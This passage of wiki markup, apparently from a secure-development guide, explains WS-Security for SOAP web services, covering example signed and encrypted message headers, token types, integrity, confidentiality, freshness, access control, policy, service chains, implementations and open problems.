''        &amp;lt;xenc:EncryptionMethod Algorithm=&amp;quot;http://www.w3.org/2001/04/xmlenc#rsa-1_5&amp;quot;/&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;dsig:KeyInfo xmlns:dsig=&amp;quot;http://www.w3.org/2000/09/xmldsig#&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	  &amp;lt;wsse:SecurityTokenReference&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	    &amp;lt;wsse:Reference URI=&amp;quot;#aXhOJ5&amp;quot; ValueType=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509v3&amp;quot;/&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	  &amp;lt;/wsse:SecurityTokenReference&amp;gt;  ''&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;/dsig:KeyInfo&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''  	&amp;lt;xenc:CipherData&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''  	  &amp;lt;xenc:CipherValue&amp;gt;Nb0Mf...&amp;lt;/xenc:CipherValue&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''  	&amp;lt;/xenc:CipherData&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''  	&amp;lt;xenc:ReferenceList&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''  	  &amp;lt;xenc:DataReference URI=&amp;quot;#aDNa2iD&amp;quot;/&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''  	&amp;lt;/xenc:ReferenceList&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;/xenc:EncryptedKey&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;wsse:SecurityTokenReference wsu:Id=&amp;quot;aZG0sG&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;wsse:KeyIdentifier ValueType=&amp;quot;http://docs.oasis-open.org/wss/2004/XX/oasis-2004XX-wss-saml-token-profile-1.0#SAMLAssertionID&amp;quot; wsu:Id=&amp;quot;a2tv1Uz&amp;quot;&amp;gt; 1106844369755&amp;lt;/wsse:KeyIdentifier&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;/wsse:SecurityTokenReference&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;saml:Assertion AssertionID=&amp;quot;1106844369755&amp;quot; IssueInstant=&amp;quot;2005-01-27T16:46:09.755Z&amp;quot; Issuer=&amp;quot;www.my.com&amp;quot; MajorVersion=&amp;quot;1&amp;quot; MinorVersion=&amp;quot;1&amp;quot; xmlns:saml=&amp;quot;urn:oasis:names:tc:SAML:1.0:assertion&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''		...				''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;/saml:Assertion&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;wsu:Timestamp wsu:Id=&amp;quot;afc6fbe-a7d8-fbf3-9ac4-f884f435a9c1&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;wsu:Created&amp;gt;2005-01-27T16:46:10Z&amp;lt;/wsu:Created&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;wsu:Expires&amp;gt;2005-01-27T18:46:10Z&amp;lt;/wsu:Expires&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;/wsu:Timestamp&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;dsig:Signature xmlns:dsig=&amp;quot;http://www.w3.org/2000/09/xmldsig#&amp;quot; Id=&amp;quot;sb738c7&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;dsig:SignedInfo Id=&amp;quot;obLkHzaCOrAW4kxC9az0bLA22&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''		...''&lt;br /&gt;
&lt;br /&gt;
''	  &amp;lt;dsig:Reference URI=&amp;quot;#s91397860&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''		...									''&lt;br /&gt;
&lt;br /&gt;
''            &amp;lt;dsig:DigestValue&amp;gt;5R3GSp+OOn17lSdE0knq4GXqgYM=&amp;lt;/dsig:DigestValue&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	  &amp;lt;/dsig:Reference&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	  &amp;lt;/dsig:SignedInfo&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	  &amp;lt;dsig:SignatureValue Id=&amp;quot;a9utKU9UZk&amp;quot;&amp;gt;LIkagbCr5bkXLs8l...&amp;lt;/dsig:SignatureValue&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	  &amp;lt;dsig:KeyInfo&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	  &amp;lt;wsse:SecurityTokenReference&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	    &amp;lt;wsse:Reference URI=&amp;quot;#aXhOJ5&amp;quot; ValueType=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509v3&amp;quot;/&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	  &amp;lt;/wsse:SecurityTokenReference&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''        &amp;lt;/dsig:KeyInfo&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;/dsig:Signature&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''    &amp;lt;/wsse:Security&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''  &amp;lt;/soap:Header&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''  &amp;lt;soap:Body xmlns:wsu=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd&amp;quot; wsu:Id=&amp;quot;s91397860&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''    &amp;lt;xenc:EncryptedData xmlns:xenc=&amp;quot;http://www.w3.org/2001/04/xmlenc#&amp;quot; Id=&amp;quot;aDNa2iD&amp;quot; Type=&amp;quot;http://www.w3.org/2001/04/xmlenc#Content&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;xenc:EncryptionMethod Algorithm=&amp;quot;http://www.w3.org/2001/04/xmlenc#tripledes-cbc&amp;quot;/&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;xenc:CipherData&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;xenc:CipherValue&amp;gt;XFM4J6C...&amp;lt;/xenc:CipherValue&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;/xenc:CipherData&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''    &amp;lt;/xenc:EncryptedData&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''  &amp;lt;/soap:Body&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''&amp;lt;/soap:Envelope&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
===Types of tokens ===&lt;br /&gt;
&lt;br /&gt;
A WSS Header may have the following types of security tokens in it:&lt;br /&gt;
&lt;br /&gt;
* Username token&lt;br /&gt;
&lt;br /&gt;
Defines mechanisms to pass username and, optionally, a password - the latter is described in the username profile document. Unless the whole token is encrypted, a message which includes a clear-text password should always be transmitted via a secured channel. In situations where the target Web Service has access to clear-text passwords for verification (this might not be possible with LDAP or some other user directories, which do not return clear-text passwords), using a hashed version with nonce and a timestamp is generally preferable. The profile document defines an unambiguous algorithm for producing password hash: &lt;br /&gt;
&lt;br /&gt;
''Password_Digest = Base64 ( SHA-1 ( nonce + created + password ) )''&lt;br /&gt;
&lt;br /&gt;
* Binary token&lt;br /&gt;
&lt;br /&gt;
They are used to convey binary data, such as X.509 certificates, in a text-encoded format, Base64 by default. The core specification defines BinarySecurityToken element, while profile documents specify additional attributes and sub-elements to handle attachment of various tokens. Presently, both the X.509 and the Kerberos profiles have been adopted.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;wsse:BinarySecurityToken EncodingType=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary&amp;quot; ValueType=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509v3&amp;quot; wsu:Id=&amp;quot;aXhOJ5&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''        MIICtzCCAi...''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;/wsse:BinarySecurityToken&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* XML token&lt;br /&gt;
&lt;br /&gt;
These are meant for any kind of XML-based tokens, but primarily – for SAML assertions. The core specification merely mentions the possibility of inserting such tokens, leaving all details to the profile documents. At the moment, SAML 1.1 profile has been accepted by OASIS.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;saml:Assertion AssertionID=&amp;quot;1106844369755&amp;quot; IssueInstant=&amp;quot;2005-01-27T16:46:09.755Z&amp;quot; Issuer=&amp;quot;www.my.com&amp;quot; MajorVersion=&amp;quot;1&amp;quot; MinorVersion=&amp;quot;1&amp;quot; xmlns:saml=&amp;quot;urn:oasis:names:tc:SAML:1.0:assertion&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''		...				''&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;/saml:Assertion&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Although technically it is not a security token, a Timestamp element may be inserted into a security header to ensure message’s freshness. See the further reading section for a design pattern on this.&lt;br /&gt;
&lt;br /&gt;
===Referencing message parts ===&lt;br /&gt;
&lt;br /&gt;
In order to retrieve security tokens, passed in the message, or to identify signed and encrypted message parts, the core specification adopts usage of a special attribute, wsu:Id. The only requirement on this attribute is that the values of such IDs should be unique within the scope of XML document where they are defined. Its application has a significant advantage for the intermediate processors, as it does not require understanding of the message’s XML Schema. Unfortunately, XML Signature and Encryption specifications do not allow for attribute extensibility (i.e. they have closed schema), so, when trying to locate signature or encryption elements, local IDs of the Signature and Encryption elements must be considered first.&lt;br /&gt;
&lt;br /&gt;
WSS core specification also defines a general mechanism for referencing security tokens via SecurityTokenReference element. An example of such element, referring to a SAML assertion in the same header, is provided below:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;wsse:SecurityTokenReference wsu:Id=&amp;quot;aZG0sGbRpXLySzgM1X6aSjg22&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	  &amp;lt;wsse:KeyIdentifier ValueType=&amp;quot;http://docs.oasis-open.org/wss/2004/XX/oasis-2004XX-wss-saml-token-profile-1.0#SAMLAssertionID&amp;quot; wsu:Id=&amp;quot;a2tv1Uz&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''            1106844369755''&lt;br /&gt;
&lt;br /&gt;
''          &amp;lt;/wsse:KeyIdentifier&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;/wsse:SecurityTokenReference&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
As this element was designed to refer to pretty much any possible token type (including encryption keys, certificates, SAML assertions, etc) both internal and external to the WSS Header, it is enormously complicated. The specification recommends using two of its possible four reference types – Direct References (by URI) and Key Identifiers (some kind of token identifier). Profile documents (SAML, X.509 for instance) provide additional extensions to these mechanisms to take advantage of specific qualities of different token types.&lt;br /&gt;
&lt;br /&gt;
==Communication Protection Mechanisms ==&lt;br /&gt;
&lt;br /&gt;
As was already explained earlier (see 0), channel security, while providing important services, is not a panacea, as it does not solve many of the issues facing Web Service developers. WSS helps addressing some of them at the SOAP message level, using the mechanisms described in the sections below.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
===Integrity ===&lt;br /&gt;
&lt;br /&gt;
WSS specification makes use of the XML-dsig standard to ensure message integrity, restricting its functionality in certain cases; for instance, only explicitly referenced elements can be signed (i.e. no Embedding or Embedded signature modes are allowed). Prior to signing an XML document, a transformation is required to create its canonical representation, taking into account the fact that XML documents can be represented in a number of semantically equivalent ways. There are two main transformations defined by the XML Digital Signature WG at W3C, Inclusive and Exclusive Canonicalization Transforms (C14N and EXC-C14N), which differ in the way namespace declarations are processed. The WSS core specification specifically recommends using EXC-C14N, as it allows copying signed XML content into other documents without invalidating the signature.&lt;br /&gt;
&lt;br /&gt;
In order to provide a uniform way of addressing signed tokens, WSS adds a Security Token Reference (STR) Dereference Transform option, which is comparable with dereferencing a pointer to an object of specific data type in programming languages. Similarly, in addition to the XML Signature-defined ways of addressing signing keys, WSS allows for references to signing security tokens through the STR mechanism (explained in 0), extended by token profiles to accommodate specific token types. A typical signature example is shown in an earlier sample in the section 0.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
Typically, an XML signature is applied to secure elements such as SOAP Body and the timestamp, as well as any user credentials, passed in the request. There is an interesting twist when a particular element is both signed and encrypted, since these operations may follow (even repeatedly) in any order, and knowledge of their ordering is required for signature verification. To address this issue, the WSS core specification requires that each new element is pre-pended to the security header, thus defining the “natural” order of operations. A particularly nasty problem arises when there are several security headers in a single SOAP message, using overlapping signature and encryption blocks, as there is nothing in this case that would point to the right order of operations.&lt;br /&gt;
&lt;br /&gt;
===Confidentiality ===&lt;br /&gt;
&lt;br /&gt;
For its confidentiality protection, WSS relies on yet another standard, XML Encryption. Similarly to XML-dsig, this standard operates on selected elements of the SOAP message, but it then replaces the encrypted element’s data with a &amp;lt;xenc:EncryptedData&amp;gt; sub-element carrying the encrypted bytes. For encryption efficiency, the specification recommends using a unique key, which is then encrypted by the recipient’s public key and pre-pended to the security header in a &amp;lt;xenc:EncryptedKey&amp;gt; element. A SOAP message with encrypted body is shown in the section 0.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
===Freshness ===&lt;br /&gt;
&lt;br /&gt;
SOAP messages’ freshness is addressed via timestamp mechanism – each security header may contain just one such element, which states, in UTC time and using the UTC time format, creation and expiration moments of the security header. It is important to realize that the timestamp is applied to the WSS Header, not to the SOAP message itself, since the latter may contain multiple security headers, each with a different timestamp. There is an unresolved problem with this “single timestampt” approach, since, once the timestamp is created and signed, it is impossible to update it without breaking existing signatures, even in case of a legitimate change in the WSS Header.&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;wsu:Timestamp wsu:Id=&amp;quot;afc6fbe-a7d8-fbf3-9ac4-f884f435a9c1&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;wsu:Created&amp;gt;2005-01-27T16:46:10Z&amp;lt;/wsu:Created&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;wsu:Expires&amp;gt;2005-01-27T18:46:10Z&amp;lt;/wsu:Expires&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;/wsu:Timestamp&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
If a timestamp is included in a message, it is typically signed to prevent tampering and replay attacks. There is no mechanism foreseen to address clock synchronization issue (which, as was already point out earlier, is generally not an issue in modern day systems) – this has to be addressed out-of-band as far as the WSS mechanics is concerned. See the further reading section for a design pattern addressing this issue.&lt;br /&gt;
&lt;br /&gt;
==Access Control Mechanisms ==&lt;br /&gt;
&lt;br /&gt;
When it comes to access control decisions, Web Services do not offer specific protection mechanisms by themselves – they just have the means to carry the tokens and data payloads in a secure manner between source and destination SOAP endpoints. &lt;br /&gt;
&lt;br /&gt;
For more complete description of access control tasks, please, refer to other sections of this Development Guide.&lt;br /&gt;
&lt;br /&gt;
===Identification ===&lt;br /&gt;
&lt;br /&gt;
Identification represents a claim to have certain identity, which is expressed by attaching certain information to the message. This can be a username, an SAML assertion, a Kerberos ticket, or any other piece of information, from which the service can infer who the caller claims to be. &lt;br /&gt;
&lt;br /&gt;
WSS represents a very good way to convey this information, as it defines an extensible mechanism for attaching various token types to a message (see 0). It is the receiver’s job to extract the attached token and figure out which identity it carries, or to reject the message if it can find no acceptable token in it.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
===Authentication ===&lt;br /&gt;
&lt;br /&gt;
Authentication can come in two flavors – credentials verification or token validation. The subtle difference between the two is that tokens are issued after some kind of authentication has already happened prior to the current invocation, and they usually contain user’s identity along with the proof of its integrity. &lt;br /&gt;
&lt;br /&gt;
WSS offers support for a number of standard authentication protocols by defining binding mechanism for transmitting protocol-specific tokens and reliably linking them to the sender. However, the mechanics of proof that the caller is who he claims to be is completely at the Web Service’s discretion. Whether it takes the supplied username and password’s hash and checks it against the backend user store, or extracts subject name from the X.509 certificate used for signing the message, verifies the certificate chain and looks up the user in its store – at the moment, there are no requirements or standards which would dictate that it should be done one way or another. &lt;br /&gt;
&lt;br /&gt;
===Authorization ===&lt;br /&gt;
&lt;br /&gt;
XACML may be used for expressing authorization rules, but its usage is not Web Service-specific – it has much broader scope. So, whatever policy or role-based authorization mechanism the host server already has in place will most likely be utilized to protect the deployed Web Services deployed as well. &lt;br /&gt;
&lt;br /&gt;
Depending on the implementation, there may be several layers of authorization involved at the server. For instance, JSRs 224 (JAX-RPC 2.0) and 109 (Implementing Enterprise Web Services), which define Java binding for Web Services, specify implementing Web Services in J2EE containers. This means that when a Web Service is accessed, there will be a URL authorization check executed by the J2EE container, followed by a check at the Web Service layer for the Web Service-specific resource. Granularity of such checks is implementation-specific and is not dictated by any standards. In the Windows universe it happens in a similar fashion, since IIS is going to execute its access checks on the incoming HTTP calls before they reach the ASP.NET runtime, where SOAP message is going to be further decomposed and analyzed.&lt;br /&gt;
&lt;br /&gt;
===Policy Agreement ===&lt;br /&gt;
&lt;br /&gt;
Normally, Web Services’ communication is based on the endpoint’s public interface, defined in its WSDL file. This descriptor has sufficient details to express SOAP binding requirements, but it does not define any security parameters, leaving Web Service developers struggling to find out-of-band mechanisms to determine the endpoint’s security requirements. &lt;br /&gt;
&lt;br /&gt;
To make up for these shortcomings, WS-Policy specification was conceived as a mechanism for expressing complex policy requirements and qualities, sort of WSDL on steroids. Through the published policy SOAP endpoints can advertise their security requirements, and their clients can apply appropriate measures of message protection to construct the requests. The general WS-Policy specification (actually comprised of three separate documents) also has extensions for specific policy types, one of them – for security, WS-SecurityPolicy.&lt;br /&gt;
&lt;br /&gt;
If the requestor does not possess the required tokens, it can try obtaining them via trust mechanism, using WS-Trust-enabled services, which are called to securely exchange various token types for the requested identity. &lt;br /&gt;
&lt;br /&gt;
[[Image: Using Trust Service.gif|Figure 5. Using Trust service]]&lt;br /&gt;
&lt;br /&gt;
Unfortunately, both WS-Policy and WS-Trust specifications have not been submitted for standardization to public bodies, and their development is progressing via private collaboration of several companies, although it was opened up for other participants as well. As a positive factor, there have been several interoperability events conducted for these specifications, so the development process of these critical links in the Web Services’ security infrastructure is not a complete black box.&lt;br /&gt;
&lt;br /&gt;
==Forming Web Service Chains ==&lt;br /&gt;
&lt;br /&gt;
Many existing or planned implementations of SOA or B2B systems rely on dynamic chains of Web Services for accomplishing various business specific tasks, from taking the orders through manufacturing and up to the distribution process. &lt;br /&gt;
&lt;br /&gt;
[[Image:Service Chain.gif|Figure 6: Service chain]]&lt;br /&gt;
&lt;br /&gt;
This is in theory. In practice, there are a lot of obstacles hidden among the way, and one of the major ones among them – security concerns about publicly exposing processing functions to intra- or Internet-based clients. &lt;br /&gt;
&lt;br /&gt;
Here are just a few of the issues that hamper Web Services interaction – incompatible authentication and authorization models for users, amount of trust between services themselves and ways of establishing such trust, maintaining secure connections, and synchronization of user directories or otherwise exchanging users’ attributes. These issues will be briefly tackled in the following paragraphs.&lt;br /&gt;
&lt;br /&gt;
===Incompatible user access control models ===&lt;br /&gt;
&lt;br /&gt;
As explained earlier, in section 0, Web Services themselves do not include separate extensions for access control, relying instead on the existing security framework. What they do provide, however, are mechanisms for discovering and describing security requirements of a SOAP service (via WS-Policy), and for obtaining appropriate security credentials via WS-Trust based services.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
===Service trust ===&lt;br /&gt;
&lt;br /&gt;
In order to establish mutual trust between client and service, they have to satisfy each other’s policy requirements. A simple and popular model is mutual certificate authentication via SSL, but it is not scalable for open service models, and supports only one authentication type. Services that require more flexibility have to use pretty much the same access control mechanisms as with users to establish each other’s identities prior to engaging in a conversation.&lt;br /&gt;
&lt;br /&gt;
===Secure connections ===&lt;br /&gt;
&lt;br /&gt;
Once trust is established it would be impractical to require its confirmation on each interaction. Instead, a secure client-server link is formed and maintained the entire time a client’s session is active. Again, the most popular mechanism today for maintaining such link is SSL, but it is not a Web Service-specific mechanism, and it has a number of shortcomings when applied to SOAP communication, as explained in 0.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
===Synchronization of user directories ===&lt;br /&gt;
&lt;br /&gt;
This is a very acute problem when dealing with cross-domain applications, as users’ population tends to change frequently among different domains. So, how does a service in domain B decide whether it is going to trust user’s claim that he has been already authenticated in domain A? There exist different aspects of this problem. First – a common SSO mechanism, which implies that a user is known in both domains (through synchronization, or by some other means), and authentication tokens from one domain are acceptable in another. In Web Services world, this would be accomplished by passing around a SAML or Kerberos token for a user. &lt;br /&gt;
&lt;br /&gt;
===Domain federation ===&lt;br /&gt;
&lt;br /&gt;
Another aspect of the problem is when users are not shared across domains, but merely the fact that a user with certain ID has successfully authenticated in another domain, as would be the case with several large corporations, which would like to form a partnership, but would be reluctant to share customers’ details. The decision to accept this request is then based on the inter-domain procedures, establishing special trust relationships and allowing for exchanging such opaque tokens, which would be an example of Federation relationships. Of those efforts, most notable example is Liberty Alliance project, which is now being used as a basis for SAML 2.0 specifications. The work in this area is still far from being completed, and most of the existing deployments are nothing more than POC or internal pilot projects than to real cross-companies deployments, although LA’s website does list some case studies of large-scale projects.&lt;br /&gt;
&lt;br /&gt;
==Available Implementations ==&lt;br /&gt;
&lt;br /&gt;
It is important to realize from the beginning that no security standard by itself is going to provide security to the message exchanges – it is the installed implementations, which will be assessing conformance of the incoming SOAP messages to the applicable standards, as well as appropriately securing the outgoing messages.&lt;br /&gt;
&lt;br /&gt;
===.NET – Web Service Extensions ===&lt;br /&gt;
&lt;br /&gt;
Since new standards are being developed at a rather quick pace, .NET platform is not trying to catch up immediately, but uses Web Service Extensions (WSE) instead. WSE, currently at the version 2.0, adds development and runtime support for the latest Web Service security standards to the platform and development tools, even while they are still “work in progress”. Once standards mature, their support is incorporated into new releases of the .NET platform, which is what is going to happen when .NET 2.0 finally sees the world. The next release of WSE, 3.0, is going to coincide with VS.2005 release and will take advantages of the latest innovations of .NET 2.0 platform in messaging and Web Application areas.&lt;br /&gt;
&lt;br /&gt;
Considering that Microsoft is one of the most active players in the Web Service security area and recognizing its influence in the industry, its WSE implementation is probably one of the most complete and up to date, and it is strongly advisable to run at least a quick interoperability check with WSE-secured .NET Web Service clients. If you have a Java-based Web Service, and the interoperability is a requirement (which is usually the case), in addition to the questions of security testing one needs to keep in mind the basic interoperability between Java and .NET Web Service data structures. &lt;br /&gt;
&lt;br /&gt;
This is especially important since current versions of .NET Web Service tools frequently do not cleanly handle WS-Security’s and related XML schemas as published by OASIS, so some creativity on the part of a Web Service designer is needed. That said – WSE package itself contains very rich and well-structured functionality, which can be utilized both with ASP.NET-based and standalone Web Service clients to check incoming SOAP messages and secure outgoing ones at the infrastructure level, relieving Web Service programmers from knowing these details. Among other things, WSE 2.0 supports the most recent set of WS-Policy and WS-Security profiles, providing for basic message security and WS-Trust with WS-SecureConversation. Those are needed for establishing secure exchanges and sessions - similar to what SSL does at the transport level, but applied to message-based communication.&lt;br /&gt;
&lt;br /&gt;
===Java toolkits ===&lt;br /&gt;
&lt;br /&gt;
Most of the publicly available Java toolkits work at the level of XML security, i.e. XML-dsig and XML-enc – such as IBM’s XML Security Suite and Apache’s XML Security Java project. Java’s JSR 105 and JSR 106 (still not finalized) define Java bindings for signatures and encryption, which will allow plugging the implementations as JCA providers once work on those JSRs is completed. &lt;br /&gt;
&lt;br /&gt;
Moving one level up, to address Web Services themselves, the picture becomes muddier – at the moment, there are many implementations in various stages of incompleteness. For instance, Apache is currently working on the WSS4J project, which is moving rather slowly, and there is commercial software package from Phaos (now owned by Oracle), which suffers from a lot of implementation problems.&lt;br /&gt;
&lt;br /&gt;
A popular choice among Web Service developers today is Sun’s JWSDP, which includes support for Web Service security. However, its support for Web Service security specifications in the version 1.5 is only limited to implementation of the core WSS standard with username and X.509 certificate profiles. Security features are implemented as part of the JAX-RPC framework and configuration-driven, which allows for clean separation from the Web Service’s implementation.&lt;br /&gt;
&lt;br /&gt;
===Hardware, software systems ===&lt;br /&gt;
&lt;br /&gt;
This category includes complete systems, rather than toolkits or frameworks. On one hand, they usually provide rich functionality right off the shelf, on the other hand – its usage model is rigidly constrained by the solution’s architecture and implementation. This is in contrast to the toolkits, which do not provide any services by themselves, but handing system developers necessary tools to include the desired Web Service security features in their products… or to shoot themselves in the foot by applying them inappropriately.&lt;br /&gt;
&lt;br /&gt;
These systems can be used at the infrastructure layer to verify incoming messages against the effective policy, check signatures, tokens, etc, before passing them on to the target Web Service. When applied to the outgoing SOAP messages, they act as a proxy, now altering the messages to decorate with the required security elements, sign and/or encrypt them.&lt;br /&gt;
&lt;br /&gt;
Software systems are characterized by significant configuration flexibility, but comparatively slow processing. On the bright side, they often provide high level of integration with the existing enterprise infrastructure, relying on the back-end user and policy stores to look at the credentials, extracted from the WSS header, from the broader perspective. An example of such service is TransactionMinder from the former Netegrity – a Policy Enforcement Point for Web Services behind it, layered on top of the Policy Server, which makes policy decisions by checking the extracted credentials against the configured stores and policies.&lt;br /&gt;
&lt;br /&gt;
For hardware systems, performance is the key – they have already broken gigabyte processing threshold, and allow for real-time processing of huge documents, decorated according to the variety of the latest Web Service security standards, not only WSS. The usage simplicity is another attractive point of those systems - in the most trivial cases, the hardware box may be literally dropped in, plugged, and be used right away. These qualities come with a price, however – this performance and simplicity can be achieved as long as the user stays within the pre-configured confines of the hardware box. The moment he tries to integrate with the back-end stores via callbacks (for those solutions that have this capability, since not all of them do), most of the advantages are lost. As an example of such hardware device, Layer 7 Technologies provides a scalable SecureSpan Networking Gateway, which acts both as the inbound firewall and the outbound proxy to handle XML traffic in real time.&lt;br /&gt;
&lt;br /&gt;
==Problems ==&lt;br /&gt;
&lt;br /&gt;
As is probably clear from the previous sections, Web Services are still experiencing a lot of turbulence, and it will take a while before they can really catch on. Here is a brief look at what problems surround currently existing security standards and their implementations.&lt;br /&gt;
&lt;br /&gt;
===Immaturity of the standards ===&lt;br /&gt;
&lt;br /&gt;
Most of the standards are either very recent (couple years old at most), or still being developed. Although standards development is done in committees, which, presumably, reduces risks by going through an exhaustive reviewing and commenting process, some error scenarios still slip in periodically, as no theory can possibly match the testing resulting from pounding by thousands of developers working in the real field. &lt;br /&gt;
&lt;br /&gt;
Additionally, it does not help that for political reasons some of these standards are withheld from public process, which is the case with many standards from the WSA arena (see 0), or that some of the efforts are duplicated, as was the case with LA and WS-Federation specifications.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
===Performance ===&lt;br /&gt;
&lt;br /&gt;
XML parsing is a slow task, which is an accepted reality, and SOAP processing slows it down even more. Now, with expensive cryptographic and textual conversion operations thrown into the mix, these tasks become a performance bottleneck, even with the latest crypto- and XML-processing hardware solutions offered today. All of the products currently on the market are facing this issue, and they are trying to resolve it with varying degrees of success. &lt;br /&gt;
&lt;br /&gt;
Hardware solutions, while substantially (by orders of magnitude) improving the performance, cannot always be used as an optimal solution, as they cannot be easily integrated with the already existing back-end software infrastructure, at least – not without making performance sacrifices. Another consideration whether hardware-based systems are the right solution – they are usually highly specialized in what they are doing, while modern Application Servers and security frameworks can usually offer a much greater variety of protection mechanisms, protecting not only Web Services, but also other deployed applications in a uniform and consistent way.&lt;br /&gt;
&lt;br /&gt;
===Complexity and interoperability ===&lt;br /&gt;
&lt;br /&gt;
As could be deduced from the previous sections, Web Service security standards are fairly complex, and have very steep learning curve associated with them. Most of the current products, dealing with Web Service security, suffer from very mediocre usability due to the complexity of the underlying infrastructure. Configuring all different policies, identities, keys, and protocols takes a lot of time and good understanding of the involved technologies, as most of the times errors that end users are seeing have very cryptic and misleading descriptions. &lt;br /&gt;
&lt;br /&gt;
In order to help administrators and reduce security risks from service misconfigurations, many companies develop policy templates, which group together best practices for protecting incoming and outgoing SOAP messages. Unfortunately, this work is not currently on the radar of any of the standard’s bodies, so it appears unlikely that such templates will be released for public use any time soon. Closest to this effort may be WS-I’s Basic Security Profile (BSP), which tries to define the rules for better interoperability among Web Services, using a subset of common security features from various security standards like WSS. However, this work is not aimed at supplying the administrators with ready for deployment security templates matching the most popular business use cases, but rather at establishing the least common denominator.&lt;br /&gt;
&lt;br /&gt;
===Key management ===&lt;br /&gt;
&lt;br /&gt;
